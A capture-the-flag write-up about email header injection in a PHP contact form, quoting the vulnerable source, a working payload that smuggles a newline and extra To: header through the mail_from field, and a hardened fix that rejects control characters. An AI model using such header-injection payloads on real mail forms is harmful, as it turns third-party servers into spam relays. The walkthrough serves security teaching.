In this challenge we're presented with a webpage that describes a mail form. Here's the hint from the main site:
```
Spam! The goal is just to send an email to any unexpected recipient, not to become admin. You'll get the flag if a correct attack payload is detected, no bot will visit the page and you'll not get emails if your attack works.
```
Viewing the page source reveals the PHP behind the form:
```php
<?php
$host = 'mobile-downloads.hax.w3challs.com';
$subject = '';
$message = '';
$from = '';
if (isset($_SERVER['HTTP_HOST']))
    $host = htmlentities($_SERVER['HTTP_HOST'], ENT_QUOTES, 'UTF-8');
$to = 'admin@'.$host;
if (isset($_POST) &&
    !empty($_POST['mail_from']) &&
    !empty($_POST['mail_subject']) &&
    !empty($_POST['mail_content']) &&
    is_string($_POST['mail_from']) &&
    is_string($_POST['mail_subject']) &&
    is_string($_POST['mail_content']))
{
    $subject = $_POST['mail_subject'];
    $message = $_POST['mail_content'];
    $from = $_POST['mail_from'];
    define('message_prefix', 'Mail sent from %s:'."\n".str_repeat('-', 64)."\n");
    $msg = sprintf(message_prefix, $host) . $message;
    // $from is used verbatim: a CR/LF inside it ends the From: line and
    // whatever follows is parsed as a new header
    $headers = 'From: '.$from."\r\n".
               'Reply-To: '.$from."\r\n".
               'X-Mailer: PHP/'.phpversion();
    if (mail($to, $subject, $msg, $headers) === TRUE)
    {
        printf('<div class="success">The message was sent</div><br />');
        $subject = ''; $message = ''; $from = '';
    }
    else printf('<div class="error">The message cannot be sent</div><br />');
}
$subject = htmlentities($subject, ENT_QUOTES, 'UTF-8');
$message = htmlentities($message, ENT_QUOTES, 'UTF-8');
$from = htmlentities($from, ENT_QUOTES, 'UTF-8');
?>
```
There are three lines we want to focus on:
```php
$from = $_POST['mail_from'];
$headers = 'From: '.$from."\r\n".
'Reply-To: '.$from."\r\n".
'X-Mailer: PHP/'.phpversion();
if (mail($to, $subject, $msg, $headers) === TRUE)
```
We control the `$from` variable, and it is concatenated into `$headers` without any sanitization before being passed to the `mail()` function. Mail headers are separated by line breaks, so a newline inside `$from` terminates the `From:` header and whatever follows it is parsed as a new header. By injecting `%0ATo:admin@mo...` at the end of the `mail_from` parameter, we get the flag.
Payload:
```
mail_from=memes%40memes.memes%0ATo:[email protected]&mail_subject=Viagra&mail_content=Viagra
```
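For comparison, here is an added example (my own code, not the challenge's) of how the form should build its headers: the sender is validated as a single address with no control characters before it touches the header string, and a rejected value is logged so the attempt shows up in detection. The `safe_sender` helper name and the log format are my assumptions.

```php
<?php
// Added example: harden the sender handling from the challenge source.
// The root cause is that CR/LF from user input reaches the header block,
// so reject those characters at the input boundary.

/**
 * Return the address if it is a single well-formed email address with no
 * control characters; otherwise return null.
 */
function safe_sender(string $from): ?string
{
    // Any CR, LF or other control character is what lets an attacker append
    // "To:", "Cc:" or "Bcc:" lines to the headers, so refuse them outright.
    if (preg_match('/[\x00-\x1F\x7F]/', $from)) {
        return null;
    }
    // FILTER_VALIDATE_EMAIL only accepts one syntactically valid address,
    // so a comma-separated list of recipients is rejected as well.
    $valid = filter_var($from, FILTER_VALIDATE_EMAIL);
    return $valid === false ? null : $valid;
}

$from   = $_POST['mail_from'] ?? '';
$sender = safe_sender($from);
if ($sender === null) {
    // Log the rejected value with control characters escaped (so the log line
    // itself cannot be split) and refuse to send anything.
    error_log('mail form: rejected sender ' . addcslashes($from, "\0..\37\177"));
    printf('<div class="error">Invalid sender address</div><br />');
    exit;
}

// Only the validated value is ever concatenated into the header block.
$headers = 'From: ' . $sender . "\r\n" .
           'Reply-To: ' . $sender . "\r\n" .
           'X-Mailer: PHP/' . phpversion();
```

Note that `htmlentities()`, which the challenge applies to `$host` and to the echoed form values, leaves `\r` and `\n` untouched, so HTML escaping would not have stopped this injection; the header block needs line breaks rejected on input, not entity-encoded on output.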
---
Tags: #ctf #web #php #injection